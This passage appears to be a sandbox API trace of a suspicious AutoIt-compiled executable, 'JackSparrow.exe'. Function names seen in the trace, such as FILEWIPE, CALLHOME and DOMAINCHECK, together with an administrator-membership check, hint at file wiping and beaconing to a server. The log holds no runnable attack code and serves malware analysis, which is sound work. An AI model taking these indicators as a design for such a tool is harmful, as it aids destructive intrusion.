lpsz="_GUICTRLEDIT_SETLIMITTEXT", cchLength=0x19 | out: lpsz="_GUICTRLEDIT_SETLIMITTEXT") returned 0x19 [0026.054] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0026.054] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0026.054] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0026.054] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0026.054] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEMAPPING", cchLength=0x19 | out: lpsz="_WINAPI_CREATEFILEMAPPING") returned 0x19 [0026.054] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEMAPPING", cchLength=0x19 | out: lpsz="_WINAPI_CREATEFILEMAPPING") returned 0x19 [0026.054] CharUpperBuffW (in: lpsz="_WINAPI_MAPVIEWOFFILE", cchLength=0x15 | out: lpsz="_WINAPI_MAPVIEWOFFILE") returned 0x15 [0026.054] CharUpperBuffW (in: lpsz="_WINAPI_MAPVIEWOFFILE", cchLength=0x15 | out: lpsz="_WINAPI_MAPVIEWOFFILE") returned 0x15 [0026.054] CharUpperBuffW (in: lpsz="_WINAPI_UNMAPVIEWOFFILE", cchLength=0x17 | out: lpsz="_WINAPI_UNMAPVIEWOFFILE") returned 0x17 [0026.054] CharUpperBuffW (in: lpsz="_WINAPI_UNMAPVIEWOFFILE", cchLength=0x17 | out: lpsz="_WINAPI_UNMAPVIEWOFFILE") returned 0x17 [0026.054] CharUpperBuffW (in: lpsz="_SINGLETON", cchLength=0xa | out: lpsz="_SINGLETON") returned 0xa [0026.055] CharUpperBuffW (in: lpsz="_SINGLETON", cchLength=0xa | out: lpsz="_SINGLETON") returned 0xa [0026.055] CharUpperBuffW (in: lpsz="_FILECOUNTLINES", cchLength=0xf | out: lpsz="_FILECOUNTLINES") returned 0xf [0026.055] CharUpperBuffW (in: lpsz="_FILECOUNTLINES", cchLength=0xf | out: lpsz="_FILECOUNTLINES") returned 0xf [0026.055] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0026.055] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0026.055] CharUpperBuffW (in: lpsz="DOMAINCHECK", cchLength=0xb | out: lpsz="DOMAINCHECK") returned 0xb [0026.055] CharUpperBuffW (in: lpsz="DOMAINCHECK", cchLength=0xb | out: lpsz="DOMAINCHECK") returned 0xb [0026.055] CharUpperBuffW (in: lpsz="_WINAPI_NETGETJOININFORMATION", cchLength=0x1d | out: lpsz="_WINAPI_NETGETJOININFORMATION") returned 0x1d [0026.055] CharUpperBuffW (in: lpsz="_WINAPI_NETGETJOININFORMATION", cchLength=0x1d | out: lpsz="_WINAPI_NETGETJOININFORMATION") returned 0x1d [0026.055] CharUpperBuffW (in: lpsz="_BUFFERSIZE", cchLength=0xb | out: lpsz="_BUFFERSIZE") returned 0xb [0026.055] CharUpperBuffW (in: lpsz="_BUFFERSIZE", cchLength=0xb | out: lpsz="_BUFFERSIZE") returned 0xb [0026.055] CharUpperBuffW (in: lpsz="CALLHOME", cchLength=0x8 | out: lpsz="CALLHOME") returned 0x8 [0026.055] CharUpperBuffW (in: lpsz="CALLHOME", cchLength=0x8 | out: lpsz="CALLHOME") returned 0x8 [0026.055] CharUpperBuffW (in: lpsz="MYERRFUNC", cchLength=0x9 | out: lpsz="MYERRFUNC") returned 0x9 [0026.055] CharUpperBuffW (in: lpsz="MYERRFUNC", cchLength=0x9 | out: lpsz="MYERRFUNC") returned 0x9 [0026.055] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JackSparrow.exe", nBufferLength=0x7fff, lpBuffer=0x69f798, lpFilePart=0x6af79c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JackSparrow.exe", lpFilePart=0x6af79c*="JackSparrow.exe") returned 0x35 [0026.055] AllocateAndInitializeSid (in: pIdentifierAuthority=0x6af798, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x6af7a0 | out: pSid=0x6af7a0*=0x793a10*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0026.055] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x793a10*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x6af7a4 | out: IsMember=0x6af7a4) returned 1 [0026.056] GetSysColorBrush (nIndex=15) returned 0x1100059 [0026.056] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0026.056] LoadIconW (hInstance=0x1270000, lpIconName=0x63) returned 0x4022b [0026.056] LoadIconW (hInstance=0x1270000, lpIconName=0xa4) returned 0x3023d [0026.057] LoadIconW (hInstance=0x1270000, lpIconName=0xa2) returned 0x3023b [0026.058] LoadImageW (hInst=0x1270000, name=0x63, type=0x1, cx=16, cy=16, fuLoad=0x0) returned 0x40231 [0026.058] RegisterClassExW (param_1=0x6af774) returned 0xc168 [0026.058] GetSysColorBrush (nIndex=15) returned 0x1100059 [0026.058] RegisterClassExW (param_1=0x6af718) returned 0xc169 [0026.058] RegisterClipboardFormatW (lpszFormat="TaskbarCreated") returned 0xc08f [0026.058] InitCommonControlsEx (picce=0x6af748) returned 1 [0026.059] ImageList_Create (cx=16, cy=16, flags=0x21, cInitial=1, cGrow=1) returned 0x7adc80 [0026.066] LoadIconW (hInstance=0x1270000, lpIconName=0xa9) returned 0x340197 [0026.066] ImageList_ReplaceIcon (himl=0x7adc80, i=-1, hicon=0x340197) returned 0 [0026.071] CreateWindowExW (dwExStyle=0x0, lpClassName="AutoIt v3", lpWindowName="AutoIt v3", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=300, nHeight=100, hWndParent=0x0, hMenu=0x0, hInstance=0x1270000, lpParam=0x0) returned 0x50134 [0026.071] NtdllDefWindowProc_W () returned 0x0 [0026.071] NtdllDefWindowProc_W () returned 0x1 [0026.074] NtdllDefWindowProc_W () returned 0x0 [0026.195] SetTimer (hWnd=0x50134, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0026.195] RegisterClipboardFormatW (lpszFormat="TaskbarCreated") returned 0xc08f [0026.195] CreatePopupMenu () returned 0x500b9 [0026.195] CreateWindowExW (dwExStyle=0x0, lpClassName="edit", lpWindowName=0x0, dwStyle=0x50b008c4, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x50134, hMenu=0x1, hInstance=0x1270000, lpParam=0x0) returned 0x50018 [0026.252] NtdllDefWindowProc_W () returned 0x0 [0026.252] ShowWindow (hWnd=0x50134, nCmdShow=0) returned 0 [0026.252] ShowWindow (hWnd=0x50134, nCmdShow=0) returned 0 [0026.253] Shell_NotifyIconW (dwMessage=0x0, lpData=0x6af3f0) returned 1 [0026.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7aef10 [0026.266] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884d70 [0026.266] Shell_NotifyIconW (dwMessage=0x1, lpData=0x6af020) returned 1 [0026.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7aef10 | out: hHeap=0x770000) returned 1 [0026.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884d70 | out: hHeap=0x770000) returned 1 [0026.266] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.266] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884d70 [0026.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x878b28 [0026.267] CharUpperBuffW (in: lpsz="_FO_FILESEARCH", cchLength=0xe | out: lpsz="_FO_FILESEARCH") returned 0xe [0026.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x878b28 | out: hHeap=0x770000) returned 1 [0026.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884d70 | out: hHeap=0x770000) returned 1 [0026.267] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884d70 [0026.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x88db38 [0026.267] CharUpperBuffW (in: lpsz="_FO_FOLDERSEARCH", cchLength=0x10 | out: lpsz="_FO_FOLDERSEARCH") returned 0x10 [0026.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88db38 | out: hHeap=0x770000) returned 1 [0026.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884d70 | out: hHeap=0x770000) returned 1 [0026.267] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884d70 [0026.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x88db38 [0026.267] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCHMASK", cchLength=0x15 | out: lpsz="__FO_FOLDERSEARCHMASK") returned 0x15 [0026.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88db38 | out: hHeap=0x770000) returned 1 [0026.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884d70 | out: hHeap=0x770000) returned 1 [0026.267] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884d70 [0026.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x88db38 [0026.267] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCH", cchLength=0x11 | out: lpsz="__FO_FOLDERSEARCH") returned 0x11 [0026.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88db38 | out: hHeap=0x770000) returned 1 [0026.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884d70 | out: hHeap=0x770000) returned 1 [0026.267] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884d70 [0026.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x88db38 [0026.267] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0026.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88db38 | out: hHeap=0x770000) returned 1 [0026.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884d70 | out: hHeap=0x770000) returned 1 [0026.267] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884d70 [0026.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x88db38 [0026.267] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0026.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88db38 | out: hHeap=0x770000) returned 1 [0026.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884d70 | out: hHeap=0x770000) returned 1 [0026.268] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884d70 [0026.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x88db38 [0026.268] CharUpperBuffW (in: lpsz="__FO_GETLISTMASK", cchLength=0x10 | out: lpsz="__FO_GETLISTMASK") returned 0x10 [0026.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88db38 | out: hHeap=0x770000) returned 1 [0026.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884d70 | out: hHeap=0x770000) returned 1 [0026.268] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884d70 [0026.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x88db38 [0026.268] CharUpperBuffW (in: lpsz="__FO_FILESEARCHTYPE", cchLength=0x13 | out: lpsz="__FO_FILESEARCHTYPE") returned 0x13 [0026.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88db38 | out: hHeap=0x770000) returned 1 [0026.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884d70 | out: hHeap=0x770000) returned 1 [0026.268] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884d70 [0026.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x88db38 [0026.268] CharUpperBuffW (in: lpsz="__FO_FILESEARCHMASK", cchLength=0x13 | out: lpsz="__FO_FILESEARCHMASK") returned 0x13 [0026.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88db38 | out: hHeap=0x770000) returned 1 [0026.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884d70 | out: hHeap=0x770000) returned 1 [0026.268] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884d70 [0026.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x878b28 [0026.268] CharUpperBuffW (in: lpsz="__FO_USERLOCALE", cchLength=0xf | out: lpsz="__FO_USERLOCALE") returned 0xf [0026.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x878b28 | out: hHeap=0x770000) returned 1 [0026.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884d70 | out: hHeap=0x770000) returned 1 [0026.268] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888a10 [0026.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8889e0 [0026.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884d70 [0026.269] RtlSizeHeap (HeapHandle=0x770000, Flags=0x0, MemoryPointer=0x795158) returned 0x80 [0026.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x878b28 [0026.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888920 [0026.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884d80 [0026.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888920 | out: hHeap=0x770000) returned 1 [0026.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x878b78 [0026.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888920 [0026.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888908 [0026.269] RtlSizeHeap (HeapHandle=0x770000, Flags=0x0, MemoryPointer=0x795158) returned 0x80 [0026.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x884d90 [0026.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888908 | out: hHeap=0x770000) returned 1 [0026.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884d90 | out: hHeap=0x770000) returned 1 [0026.269] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x878ba0 [0026.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888908 [0026.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884d90 [0026.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888908 | out: hHeap=0x770000) returned 1 [0026.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x878bc8 [0026.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888908 [0026.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888a88 [0026.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x884da0 [0026.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888a88 | out: hHeap=0x770000) returned 1 [0026.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884da0 | out: hHeap=0x770000) returned 1 [0026.270] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x878bf0 [0026.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888a88 [0026.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884da0 [0026.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888a88 | out: hHeap=0x770000) returned 1 [0026.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x878c18 [0026.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888a88 [0026.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888aa0 [0026.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x884db0 [0026.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888aa0 | out: hHeap=0x770000) returned 1 [0026.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884db0 | out: hHeap=0x770000) returned 1 [0026.270] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x878c40 [0026.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888aa0 [0026.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884db0 [0026.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888aa0 | out: hHeap=0x770000) returned 1 [0026.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x878c68 [0026.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888aa0 [0026.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888ab8 [0026.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x884dc0 [0026.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888ab8 | out: hHeap=0x770000) returned 1 [0026.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884dc0 | out: hHeap=0x770000) returned 1 [0026.270] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x878c90 [0026.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888ab8 [0026.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884dc0 [0026.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888ab8 | out: hHeap=0x770000) returned 1 [0026.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x88db38 [0026.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888ab8 [0026.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888ad0 [0026.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x884dd0 [0026.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888ad0 | out: hHeap=0x770000) returned 1 [0026.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888ad0 [0026.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884de0 [0026.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888ad0 | out: hHeap=0x770000) returned 1 [0026.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884de0 | out: hHeap=0x770000) returned 1 [0026.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x878cb8 [0026.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888ad0 [0026.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x884de0 [0026.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884de0 | out: hHeap=0x770000) returned 1 [0026.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888ae8 [0026.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x884de0 [0026.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884de0 | out: hHeap=0x770000) returned 1 [0026.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888ad0 | out: hHeap=0x770000) returned 1 [0026.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888ae8 | out: hHeap=0x770000) returned 1 [0026.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x878cb8 | out: hHeap=0x770000) returned 1 [0026.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884dd0 | out: hHeap=0x770000) returned 1 [0026.271] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x878cb8 [0026.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888ae8 [0026.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884dd0 [0026.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888ae8 | out: hHeap=0x770000) returned 1 [0026.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x878ce0 [0026.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888ae8 [0026.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888ad0 [0026.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x884de0 [0026.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888ad0 | out: hHeap=0x770000) returned 1 [0026.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884de0 | out: hHeap=0x770000) returned 1 [0026.271] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x878d08 [0026.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888ad0 [0026.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884de0 [0026.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888ad0 | out: hHeap=0x770000) returned 1 [0026.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x88db70 [0026.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888ad0 [0026.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888b00 [0026.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x884df0 [0026.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888b00 | out: hHeap=0x770000) returned 1 [0026.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884df0 | out: hHeap=0x770000) returned 1 [0026.272] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x878d30 [0026.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888b00 [0026.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884df0 [0026.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888b00 | out: hHeap=0x770000) returned 1 [0026.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x88dba8 [0026.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888b00 [0026.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888b18 [0026.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x884e00 [0026.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888b18 | out: hHeap=0x770000) returned 1 [0026.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884e00 | out: hHeap=0x770000) returned 1 [0026.272] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x878d58 [0026.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888b18 [0026.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884e00 [0026.272] HeapFree (in: 